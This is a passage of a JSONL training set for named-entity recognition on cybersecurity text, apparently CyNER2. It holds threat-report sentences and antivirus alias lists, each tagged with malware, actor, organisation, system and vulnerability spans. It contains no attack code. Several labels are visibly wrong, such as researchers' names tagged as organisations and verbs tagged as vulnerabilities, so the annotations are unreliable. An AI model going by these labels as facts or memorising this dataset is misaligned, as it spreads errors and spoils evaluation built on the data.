TrojanDropper:Win32/Injector.D Worm.Win32.Recyl.afr Worm/Win32.Recyl.R213857 MalwareScope.Trojan-PSW.Game.16 Worm.Recyl!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001728", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Uztuby.11 Trojan.Uztuby.11 Trojan.Uztuby.11 Trojan.Uztuby.11 Trojan.Win32.Delphi.elmrxd Trojan.Uztuby.11 Trojan.Uztuby.11 backdoor.win32.fynloski.a Backdoor/Win32.fynloski.pwi Trojan.GUSX-6 TR/AD.AVKiller.reish Win32/Remtasu.AI Backdoor.NanoBot! Trojan.Win32.Remtasu Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001732", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Small!O Hacktool.Hashenfill Trojan.Small.Win32.19365 Trojan.Win32.Small.cpa Trojan.Win32.Small.cwxrxw Troj.W32.Small.cpa!c Trojan.Hooker.21682 BehavesLike.Win32.FakeAlert.xh Trojan/Small.ouz HackTool:Win32/Hashenfill.A Trojan.Win32.Small.cpa Trojan/Win32.Connapts.C256359 Trojan.Small Win32.Trojan.Small.Dxcs Trojan.Small!tZ/zbi7RotE Win32/Trojan.d54", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001733", "source": "cyner2_train"}} {"text": "It appears the entity behind this campaign took steps to make reverse engineering more difficult and chose the use of Cisco's AnyConnect Client as a lure to trick victims into installing the malware.", "spans": {"THREAT_ACTOR: campaign": [[34, 42]], "SYSTEM: Cisco's AnyConnect Client": [[118, 143]], "MALWARE: malware.": [[191, 199]]}, "info": {"id": "cyner2_train_001734", "source": "cyner2_train"}} {"text": "A new stealer with keylogging and clipper capabilities is making the rounds on cybercrime forums, according to research by Uptycs threat research team and Shilpesh Trivedi and Tejaswini Sandapolla.", "spans": {"MALWARE: stealer with keylogging": [[6, 29]], "THREAT_ACTOR: cybercrime forums,": [[79, 97]], "ORGANIZATION: Uptycs threat research team": [[123, 150]], "ORGANIZATION: Shilpesh Trivedi": [[155, 
171]], "ORGANIZATION: Tejaswini Sandapolla.": [[176, 197]]}, "info": {"id": "cyner2_train_001736", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9828 Trojan.Win32.Fsysna.csibjc Trojan.DownLoader9.58423 BehavesLike.Win32.BadFile.mh Trojan/Fsysna.anj TR/Terzib.wrdas Trojan:Win32/Terzib.A Worm/Win32.Stration.R523 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001738", "source": "cyner2_train"}} {"text": "El Machete is one of these threats that was first publicly disclosed and named by Kaspersky.", "spans": {"MALWARE: El Machete": [[0, 10]], "MALWARE: threats": [[27, 34]], "ORGANIZATION: Kaspersky.": [[82, 92]]}, "info": {"id": "cyner2_train_001742", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Lamer.K8 Trojan.Kryptik.Win32.801927 Trojan/Delf.nlr Win32.Trojan.WisdomEyes.16070401.9500.9998 WORM_GATE_GE2300D6.UVPA Win.Trojan.Fileinfector-76 Trojan.Win32.Delphi.danila Worm.Win32.Delf.DA WORM_GATE_GE2300D6.UVPA BehavesLike.Win32.Gate.tc W32.Infector Worm/Win32.Unknown Worm:Win32/Gate.A W32.Lamer.lwJ1 Spyware/Win32.Delf.C43787 W32/Gate.worm Trojan.Cosmu Win32/Delf.NLR Worm.Delf!2LR1nmaG85k Trojan-PWS.Win32.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001743", "source": "cyner2_train"}} {"text": "On May 12, at the onset of the WannaCry attack, Cyphort Labs researchers have seen a similar SMB attack to one of our honeypot servers.", "spans": {"MALWARE: WannaCry": [[31, 39]], "ORGANIZATION: Cyphort Labs researchers": [[48, 72]], "SYSTEM: our honeypot servers.": [[114, 135]]}, "info": {"id": "cyner2_train_001744", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Mramak.A W32.Mkar.A4 Win32.Mramak.A Win32.Mramak.A Win32.Trojan.WisdomEyes.16070401.9500.9981 W32/Mkar.PJKY-3509 W32.Marak Win.Trojan.Mkar-3 Win32.Mramak.A Virus.Win32.Mkar.b Win32.Mramak.A Virus.Win32.Packed.deljve Win32.Mrak.A Win32.Mramak.A 
Win32.HLLP.Mrak.10 BehavesLike.Win32.Dropper.mc W32/Mkar.L W32/Mkar.b.Dropper Worm:Win32/Mkar.B Virus.Win32.Mkar.b Malware/Win32.Mkar.C408081 Win32/Mkar.B Win32.Virus.Mkar.Agle", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001745", "source": "cyner2_train"}} {"text": "The attack has been active for more than a year and is ongoing elsewhere, but this particular infection pathway was shut down when the site operator and ad network were notified of the activity.", "spans": {"ORGANIZATION: the site operator and ad network": [[131, 163]]}, "info": {"id": "cyner2_train_001749", "source": "cyner2_train"}} {"text": "A backdoor also known as: JS:Trojan.JS.Downloader.HZQ Trojan.JS.Downloader.2455.A JS/Nemucod.tm JS/Downldr.HX2!Eldorado JS.Downloader JS/TrojanDownloader.Nemucod.DFV JS_NEMUCOD.ELDSAUHG JS:Trojan.JS.Downloader.HZQ JS:Trojan.JS.Downloader.HZQ Trojan.Script.Heuristic-js.iacgm JS.S.Downloader.1658 JS:Trojan.JS.Downloader.HZQ JS:Trojan.JS.Downloader.HZQ Trojan.DownLoader25.3813 JS_NEMUCOD.ELDSAUHG JS/Nemucod.tm JS/Downldr.HX2!Eldorado Trojan[Downloader]/JS.Nemucod.dfv JS:Trojan.JS.Downloader.HZQ JS/Obfus.S237 Trojan-Dowloader.JS.Nemucod JS/Nemucod.DFV!tr.dldr Win32/Trojan.Downloader.50a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001750", "source": "cyner2_train"}} {"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we ’ ve observed many cases of Microsoft Windows and 
Apple iOS malware designed to attack mobile devices .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "MALWARE: DualToy": [[440, 447]], "SYSTEM: Windows": [[454, 461]], "SYSTEM: Android": [[493, 500]], "SYSTEM: iOS": [[505, 508]], "SYSTEM: Microsoft Windows": [[619, 636]], "SYSTEM: Apple iOS": [[641, 650]]}, "info": {"id": "cyner2_train_001754", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSILInject.A4 TROJ_NECURS.SMJ6 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/Inject.fcAMLbC TROJ_NECURS.SMJ6 Trojan.MSIL.Inject.aqjr Trojan.Win32.Inject.ddhqep Troj.Dropper.W32.Injector.m7mC TrojWare.Win32.Zusy.XYN Trojan.Inject1.44093 Trojan.Win32.Inject TR/Zusy.xynynabm Trojan/Win32.Inject Trojan.Zusy.D1889E Trojan.MSIL.Inject.aqjr Trojan:MSIL/Injector.P Dropper/Win32.Necurs.R121870 Trojan.Inject Trojan.Injector Trojan.Injector!AbCu/r2al/E MSIL/Injector.ERR!tr Win32/Trojan.304", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001755", "source": "cyner2_train"}} {"text": "This targeting is also consistent with previous attacker TTPs; Ke3chang historically targeted the Ministry of Affairs, and also conducted several prior campaigns against India.", "spans": {"THREAT_ACTOR: attacker": [[48, 56]], "MALWARE: Ke3chang": [[63, 71]], "ORGANIZATION: the Ministry of Affairs,": [[94, 118]], "THREAT_ACTOR: campaigns": [[152, 161]]}, "info": {"id": "cyner2_train_001756", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pws.Gadu.L Trojan-PSW.Win32.Gadu!O TrojanPWS.Gadu Trojan/PSW.Gadu.l W32/PWStealer.FCG Backdoor.Trojan Win.Spyware.8306-2 Trojan.Pws.Gadu.L Trojan-PSW.Win32.Gadu.l Trojan.Pws.Gadu.L Trojan.Win32.Gadu.wwgc Trojan.Win32.PSWGadu.197820 Troj.Psw.W32!c Trojan.Pws.Gadu.L Trojan.PWS.Gadu Trojan.Gadu.Win32.1 BehavesLike.Win32.Trojan.cc W32/PWS.FWUF-5609 Trojan/PSW.Gadu.a Trojan[PSW]/Win32.Gadu Win32.PSWTroj.Gadu.g.kcloud Trojan.Pws.Gadu.L Trojan-PSW.Win32.Gadu.l PWS:Win32/Gadu.H 
Trojan/Win32.Xema.C89273 TrojanPSW.Gadu Trojan.Pws.Gadu.L Trojan.Pws.Gadu.L Bck/Gadu.Q Win32/PSW.Delf.OQP Win32.Trojan-qqpass.Qqrob.Wxrk Trojan.PWS.Gadu!8+g7gjB8P1Q Trojan-PWS.Win32.Gadu W32/Gadu.L!tr.pws Win32/Trojan.3ea", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001757", "source": "cyner2_train"}} {"text": "A backdoor also known as: MSIL/Filecoder.EO Trojan-Ransom.FileCoder MSIL/Filecoder.EO!tr Trojan.Ransom.MSIL.1 Trojan.Ransom.SureRansom MSIL.Trojan-Ransom.SureRansom.A Win32/Trojan.Ransom.935", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001760", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O Win32.Trojan.WisdomEyes.16070401.9500.9960 Trojan.Malcol Win32/Tnega.bcLXSH Trojan.Win32.Slym.cufsch Troj.Rogue.lC4c Backdoor.Win32.Hupigon.rgqw Trojan.DownLoader11.11699 BehavesLike.Win32.Backdoor.vh TR/Rogue.kdv.679349 Packed.Win32.MalPackedSN Win32.Application.PUPStudio.A Unwanted/Win32.HackTool.R40115 Spyware.OnlineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001761", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ShizNHm.Trojan Ransom.TeslaCrypt.WR4 Trojan/Spy.Shiz.nct Ransom_HPLOCKY.SM1 Win32.Trojan.WisdomEyes.16070401.9500.9998 Ransom_HPLOCKY.SM1 Win.Trojan.Blocker-380 Trojan.Win32.Shifu.jt Trojan.Win32.Blocker.dxvhyb Packer.W32.Tpyn.toCt Trojan.DownLoader17.27888 Trojan.Blocker.Win32.32151 BehavesLike.Win32.Ransomware.hz Trojan.Win32.Pariham Trojan.Blocker.iv TR/Crypt.Xpack.whza Trojan[Ransom]/Win32.Blocker Ransom.Locky/Variant Trojan.Win32.Shifu.jt Trojan:Win32/Pariham.A Hoax.Blocker Trojan.Shifu Win32/Spy.Shiz.NCT Win32.Trojan.Shifu.Eehh Trojan.Blocker!epDzUGNGGeo W32/Kryptik.EFAD!tr Win32/Trojan.ff4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001763", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Rackcrypt Trojan.Graftor.D5D262 
Ransom_Rackcrypt.R002C0DKE17 Trojan.Win32.Z.Graftor.1886447 Ransom_Rackcrypt.R002C0DKE17 BehavesLike.Win32.FakeAlertSecurityTool.tc Virus.Win32.Vundo Trojan[Spy]/Win32.KeyLogger.dwl Ransom:Win32/Rackcrypt.A Trj/CI.A Win32.Trojan.Dropper.Wsjz", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001764", "source": "cyner2_train"}} {"text": "JS/Nemucod usually arrives on an infected machine through malicious spam emails with .zip extensions.", "spans": {"SYSTEM: machine": [[42, 49]]}, "info": {"id": "cyner2_train_001767", "source": "cyner2_train"}} {"text": "Although it claims to be using asymmetric RSA-2048 to encrypt files, it is making use of symmetric AES instead.", "spans": {}, "info": {"id": "cyner2_train_001769", "source": "cyner2_train"}} {"text": "The malware performs malicious activities such as reading login credentials, accessing files, keylogging, remote desktop control, and remote control of compromised machines.", "spans": {"MALWARE: The malware": [[0, 11]], "MALWARE: malicious activities": [[21, 41]], "SYSTEM: compromised machines.": [[152, 173]]}, "info": {"id": "cyner2_train_001771", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod14e.Trojan.9d88 Irc.Worm.Golember.V Worm/W32.Golember.34816 I-Worm.Golember.v.n3 Worm.Golember.Win32.8 Trojan/Golember.v Worm.Golember!SM/OEFSeEEs W32/Golember.P IRC-Worm.Win32.Golember.v Irc.Worm.Golember.V Trojan.Win32.Golember.furx Irc.Worm.Golember.V Worm.Win32.Golember.V Irc.Worm.Golember.V BehavesLike.Win32.Dropper.nc W32/Golember.YQQU-9034 I-Worm/Golember.e Worm/Irc.Golember.V Worm[IRC]/Win32.Golember Worm.Golember.v.kcloud Worm:Win32/Flip.A Irc.Worm.Golember.V Win32/Golember.worm.34816 IRCWorm.Golember Win32/Golember.V Win32.Worm-irc.Golember.Aojg IRC/ROSYA.V!worm IRC-Worm/Golember.O Worm.Win32.Golember.AxNU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001772", "source": "cyner2_train"}} {"text": "A backdoor also known as: HEUR_PDF.D2 
PDF/Trojan.SHCJ-8 possible-Threat.PDF.Acmd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001774", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Mintal.309248 W32/Mintal.003 Trojan.Win32.Mintal.hgbj W32.Mintal.Worm Win32/Howeem.A Email-Worm.Win32.Mintal.003 I-Worm.Mintal!SHAyifSwe/s I-Worm.Win32.A.Mintal.309248[h] Worm.Win32.Howeem.A Win32.HLLM.Hwm.3 Worm.Mintal.Win32.1 W32/Howeem.worm W32/Risk.CCZK-5590 I-Worm/Mintal.003 WORM/Mintal.003.A Worm[Email]/Win32.Mintal W32.W.Mintal.003!c Win32/Mintal.worm.309248 Worm:Win32/Mintal.A@mm W32/Howeem.worm Worm.Mintal Worm.Win32.Mintal.Ao Win32.Worm-email.Mintal.Hxqd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001775", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Lizarbot.FC.2716 Backdoor.IRCBot BKDR_LIZARBOT.SMVJ18 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.QJOG-5659 Backdoor.IRC.Bot BKDR_LIZARBOT.SMVJ18 Win.Trojan.Lizarbot-1 MSIL.Trojan.IRCBot.I Trojan.DownLoader24.64862 Trojan.Zusy.D3A924 Backdoor:MSIL/Lizarbot.A Trojan/Win32.Bladabindi.C230655 Trj/CI.A Trojan.MSIL.IRCBot Win32/Trojan.158", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001776", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.FA61 Trojan.Zonidel Win32.Trojan.WisdomEyes.16070401.9500.9990 Backdoor.Trojan Win32/TrojanDownloader.Wauchos.CY BKDR_ANDROM.YYSMQH Trojan.Win32.Zonidel.bko Trojan.Win32.Wauchos.eujxed Win32.Trojan.Zonidel.Agux Trojan.DownLoader25.48331 BehavesLike.Win32.Backdoor.fm W32/Trojan.EGNB-8448 Malicious_Behavior.SB Trojan/Win32.Zonidel Trojan.Win32.Zonidel.bko Trojan:Win32/Koneqzu.A Trojan/Win32.Zonidel.C2210520 Trojan.PasswordStealer Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001777", "source": "cyner2_train"}} {"text": "Bart has a payment screen like Locky but encrypts files without first connecting to a command and control C C 
server.", "spans": {"MALWARE: Bart": [[0, 4]], "MALWARE: Locky": [[31, 36]]}, "info": {"id": "cyner2_train_001778", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.27 Win32.Trojan.WisdomEyes.16070401.9500.9997 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.A Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg PE_VIRUX.A BehavesLike.Win32.AdwareYTBlock.mh Trojan-Downloader.Win32.Dldwp Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.nf.53248 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32.Virut.E Virus.Win32.Virut.tt W32/Virut.CE W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001780", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Risk.VHAX-4717 Backdoor.NetBus.svr Win.Trojan.NBSpy-2 Backdoor.Win32.NBSpy.b Trojan.Win32.Inject.cwlwfo Backdoor.W32.NBSpy.b!c BackDoor.NetBus Backdoor.Win32.Netbus BDS/Netbus.20.F Trojan[Backdoor]/Win32.NBSpy Backdoor:Win32/Netbus.C Backdoor.Win32.NBSpy.b TrojanDropper.Injector Trj/CI.A Win32/Netbus.20.C W32/Netbus.20C!tr Win32/Backdoor.55f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001782", "source": "cyner2_train"}} {"text": "While there have been several Suckfly campaigns that infected organizations with the group's custom malware Backdoor.Nidiran, the Indian targets show a greater amount of post-infection activity than targets in other regions.", "spans": {"THREAT_ACTOR: Suckfly campaigns": [[30, 47]], "ORGANIZATION: organizations": [[62, 75]], "THREAT_ACTOR: group's": [[85, 92]], "MALWARE: custom malware": [[93, 107]]}, "info": {"id": "cyner2_train_001787", "source": "cyner2_train"}} {"text": "EITest: HoeflerText Popups Targeting Google Chrome Users Now Push RAT Malware", "spans": {"SYSTEM: Google Chrome": [[37, 50]], "ORGANIZATION: Users": [[51, 56]], "MALWARE: Push RAT Malware": [[61, 77]]}, "info": {"id": "cyner2_train_001788", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Backdoor/ZAccess.zmv Win.Trojan.Autoit-452 Trojan.Win32.Inject.eyew Trojan.Packed.23726 Trojan.Win32.Inject.eyew Win32/Injector.Autoit.DG W32/Autoit.DG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001789", "source": "cyner2_train"}} {"text": "Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year.", "spans": {"MALWARE: RIG exploit kit!": [[26, 42]], "MALWARE: RIG": [[73, 76]]}, "info": {"id": "cyner2_train_001790", "source": "cyner2_train"}} {"text": "As recorded in several other Ursnif campaigns reported since April 2017, this Word document contains several obfuscated VBS files which load malicious DLLs through WMI.", "spans": {"THREAT_ACTOR: Ursnif campaigns": [[29, 45]], "ORGANIZATION: load malicious DLLs through WMI.": [[136, 168]]}, "info": {"id": "cyner2_train_001791", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VidroKDI.Worm Trojan-Dropper.Win32.Vidro!O Trojan.Vidro.S978560 Dropper.Vedro.Win32.4 Trojan/Dropper.Vidro.aei TROJ_KRYPTIK.SM Win32.Trojan-Downloader.Small.e W32/Trojan2.NPXJ Win32/Vidro.A TROJ_KRYPTIK.SM Win.Trojan.Vidro-11 Trojan.Win32.Vidro.bcqjb Trojan.Win32.Inject.dc Trojan.Inject.8798 BehavesLike.Win32.PWSZbot.qh Trojan-Dropper.Win32.Vidro W32/Trojan.SIZW-6937 TrojanDropper.Vidro.ko Trojan/Win32.Diple TrojanDropper:Win32/Vidro.C Trojan.Heur.ED30AD Dropper.Vidro.32768 Win-Trojan/Vidro.60416.B Trojan.Ahent.0322 Trojan.Vidro Trojan.Vidro Win32/TrojanDownloader.Small.OXH Trojan.Diple!gc4cFvq58+U W32/P2PWorm.HO.worm Backdoor.Win32.Vidro.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001793", "source": "cyner2_train"}} {"text": "We recently observed a new sample Detected by Trend Micro as TROJ_CVE20170199.JVU exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the 
wild before.", "spans": {"MALWARE: sample": [[27, 33]], "ORGANIZATION: Trend Micro": [[46, 57]], "VULNERABILITY: exploiting": [[82, 92]], "SYSTEM: PowerPoint Slide Show—the": [[138, 163]]}, "info": {"id": "cyner2_train_001794", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Starter.49160 Trojan.Win32.Starter!O Trojan.Mauvaise.SL1 Trojan/Starter.ast Win32.Trojan.FakeMicro.d Win32/Chekafe.N TROJ_STRTER.SMUK Win.Trojan.Starter-293 Trojan.Win32.Starter.trq Trojan.Win32.Starter.brvob Trojan.Win32.Starter.65536.C TrojWare.Win32.Starter.clj Trojan.Starter.1524 Trojan.Starter.Win32.261 TROJ_STRTER.SMUK Trojan/Starter.fd TR/Starter.TV Trojan/Win32.Starter Trojan.Starter.1 Trojan.Win32.Starter.trq Trojan:Win32/Chekafev.C Trojan/Win32.Starter.R1734 Trojan.Starter Win32/Spy.Chekafev.AA Trojan.Starter!lzYxQhoD/t8 Trojan.Win32.Starter", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001795", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper Waledac.M Win32.Waledac.b Trojan.Win32.Meredrop!IK Win32/Xema.worm.31232.I Trojan.Win32.Meredrop W32/Waledac.B!tr Injector.CD Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001796", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Crowti.MUE.A6 Ransom.Cerber Trojan.Zusy.D3175D Ransom.CryptXXX!g17 Ransom_HPCRYPMIC.SM4 Trojan.Win32.Z.Zusy.92672.FP Trojan.Encoder.5047 Ransom_HPCRYPMIC.SM4 TR/Crypt.Xpack.pzdls Ransom:Win32/Tovicrypt.A Trojan/Win32.CryptXXX.R185958 Trojan-Ransom.Locky Win32/Trojan.f15", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001798", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Uds.Dangerousobject.Multi!c W32/Trojan.YSQI-3970 Trojan.Symmi.D3C9A Backdoor:Win32/Touasper.A Win32.Trojan.Spy.Efvi W32/Injector.AQM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_001800", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D3C7E6 Win32.Trojan.WisdomEyes.16070401.9500.9953 BehavesLike.Win32.Trojan.jm Trojan:Win32/Ceatrg.A Trojan/Win32.RemoteAdmin.C2229526 Trojan.MSIL.Bladabindi Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001801", "source": "cyner2_train"}} {"text": "The attackers compromised the website of the Evangelical Lutheran Church of Hong Kong and modified it to host a malicious iFrame which redirected visitors to another website hosting an exploit of the Internet Explorer Microsoft Internet Explorer Remote Memory Corruption Vulnerability CVE-2015-2502.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "VULNERABILITY: compromised": [[14, 25]], "ORGANIZATION: Evangelical Lutheran Church": [[45, 72]], "MALWARE: malicious": [[112, 121]], "MALWARE: exploit": [[185, 192]], "SYSTEM: Internet Explorer Microsoft Internet Explorer": [[200, 245]], "VULNERABILITY: Remote Memory Corruption Vulnerability": [[246, 284]]}, "info": {"id": "cyner2_train_001802", "source": "cyner2_train"}} {"text": "Detected as TROJ_WERDLOD, this new malware has been causing problems in the country since December 2014 with more than 400 confirmed victims.", "spans": {"MALWARE: malware": [[35, 42]]}, "info": {"id": "cyner2_train_001804", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Joiner!O Worm.Rebhip.A8 Trojan/Dropper.Joiner.k TROJ_MULTIDROP.Q W32/Dropper.ANIA Backdoor.Colfusion Win32/TheJoiner.15x.C TROJ_MULTIDROP.Q Trojan-Dropper.Win32.Joiner.k Trojan.Win32.Joiner.epmz Trojan.Win32.Z.Joiner.417292 Backdoor.W32.l8Tn TrojWare.Win32.TrojanDropper.Joiner.K Trojan.MulDrop.32 Dropper.Joiner.Win32.430 BehavesLike.Win32.Downloader.gc Trojan-Dropper.Win32.Joiner W32/Risk.SFJA-2732 TrojanDropper.Win32.Joiner.k Trojan/Win32.Llac.cxsz Trojan-Dropper.Win32.Joiner.k Trojan.Llac Trj/Runner.Joiner.K Win32/TrojanDropper.Joiner.K 
Win32.Trojan-dropper.Joiner.Lkdg Trojan.DR.Joiner!ZtouwF9CQqA RAT.CyberGate W32/SkyRat.DLE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001806", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Flood.Vb.DN Trojan/W32.Flooder.20992.B Trojan.Flood.Vb.DN Trojan/VB.dn Trojan.Flood.Vb.DN W32/VirTool.GZ Hacktool.Flooder Win32/Flooder.VB.DN Win.Trojan.Nudgema-1 IM-Flooder.Win32.VB.dn Trojan.Win32.VB.mdnh Win32.Trojan.Vb.Wrhd Trojan.Flood.Vb.DN TrojWare.Win32.Flooder.VB.DN Trojan.Flood.Vb.DN FDOS.IM.451 Tool.VB.Win32.1591 BehavesLike.Win32.Trojan.mh W32/Tool.QSEE-8541 IM-Flooder.VB.fg TR/Flood.VB.DN.1 HackTool[Flooder]/Win32.VB HackTool:Win32/Aflooder.D Trojan.Flood.Vb.DN IM-Flooder.W32.VB.dn!c Trojan.Flood.Vb.DN Trojan/Win32.Xema.N61964869 IMFlooder.VB Trojan-PWS.Win32.Executant.d Malware_fam.gw Flooder.LZ Flooder/Nudge.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001807", "source": "cyner2_train"}} {"text": "In mid-October 2016, he received an unexpected phone call.", "spans": {}, "info": {"id": "cyner2_train_001808", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MoonLight.Trojan Win32.Emailworm.LW Worm.Lightmoon.MF.213 Win32.Emailworm.LW Worm.VB.Win32.314 W32/VB.by Win32.Emailworm.LW Win32.Worm.VB.a W32/Worm.CIPA-1476 W32.Rontokbro@mm Win32/Lightmoon.D WORM_VB.VV Email-Worm.Win32.VB.by Trojan.Win32.VB.dyztaz I-Worm.Win32.VB.35176 W32.W.VBNA.mhOD Worm.Win32.NoonLight.F BehavesLike.Win32.Trojan.nc W32/EmailWorm.LW Worm.VB.gi TR/BAS.Samca.12113913 Worm:Win32/Lightmoon.H Win32.Emailworm.LW Email-Worm.Win32.VB.by Win32.Emailworm.LW HEUR/Fakon.mwf Win32.Emailworm.LW W32/Moonlight.B.worm I-Worm.NoonLight.F Win32/NoonLight.F Win32.Worm-email.Vb.Hssm I-Worm.VB.WEI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001809", "source": "cyner2_train"}} {"text": "One of those binaries was initially thought to be a new variant of the Padpin ATM malware 
family.", "spans": {"MALWARE: variant": [[56, 63]], "MALWARE: the Padpin ATM malware family.": [[67, 97]]}, "info": {"id": "cyner2_train_001810", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9786 TROJ_ONKODS.SMFF Trojan.DownLoader13.29927 TROJ_ONKODS.SMFF TrojanDownloader:Win32/Cerber.A Trojan.Zbot.188 Trojan/Win32.Fakeavlock.R144660 Trojan-Downloader.Win32.Tiny", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001818", "source": "cyner2_train"}} {"text": "These solutions are typical in enterprise environments.", "spans": {"SYSTEM: enterprise environments.": [[31, 55]]}, "info": {"id": "cyner2_train_001819", "source": "cyner2_train"}} {"text": "The ransomware is designed to infect Microsoft Windows computers.", "spans": {"MALWARE: ransomware": [[4, 14]], "SYSTEM: Microsoft Windows computers.": [[37, 65]]}, "info": {"id": "cyner2_train_001821", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Delf.NGA Worm.Win32.Delf!O Worm.Delf Win32.Worm.Delf.NGA Win32.Worm.Delf.bd W32/Trojan2.MIZZ W32.Screentief Win32/Screentief.A WORM_AUTORUN.GKP Worm.Win32.Delf.vn Win32.Worm.Delf.NGA Win32.Worm.Delf.clov Win32.Worm.Delf.NGA TrojWare.Win32.PSW.OnLineGames.~LDK Win32.Worm.Delf.NGA Trojan.DownLoader4.55571 WORM_AUTORUN.GKP W32/Trojan.DZCT-6244 Worm:Win32/Screenthif.A Worm/Win32.Delf Worm:Win32/ScreenThif.A Win32.Worm.Delf.NGA Trojan.Win32.Scar.702464 Worm.Win32.Delf.vn Win32.Worm.Delf.NGA HEUR/Fakon.mwf Win32.Delf Win32/Delf.NQC W32/Delf.NQC!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001822", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DontovoF.Trojan Trojan.Hacktool.Httptunnel.A Trojan/W32.HackTool.36864.I Trojan.Hacktool.Httptunnel.A Tool.HTTPTunnel.Win32.1 Trojan/Hacktool.HTTPTunnel Trojan.Hacktool.Httptunnel.A 